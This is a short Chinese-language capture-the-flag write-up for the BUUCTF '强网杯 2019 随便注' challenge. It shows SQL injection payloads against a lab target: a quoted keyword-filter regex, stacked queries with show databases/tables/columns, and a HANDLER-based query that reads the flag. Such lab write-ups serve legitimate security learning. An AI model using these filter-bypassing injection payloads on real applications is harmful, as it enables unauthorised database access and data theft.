BUUCTF [强网杯 2019]随便注解题思路

来点新东西

打开靶机

 

一看就有意思,先构造注入1' union select 1,2,3#

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

被过滤了,防御还不错

那用order by爆字段 1' order by 3#的时候报错

select被过滤了,想了一下用show来输出,编造 0';show databases;#

爆出库名

因此类推0';show tables;#

 

 

 爆出表名

 

再用0'; show columns from `1919810931114514`;#

爆出列名

 

 

 

 

然后,然后我也不太明白了...

后面翻了一下大佬的博客.发现做题方法还挺多

然后看到一个用handler来写的,用于一行行输出表内数据

开始构造payload:

0'; handler  `1919810931114514` open as `p`;handler `p` read next;#

 

 

 flag出现了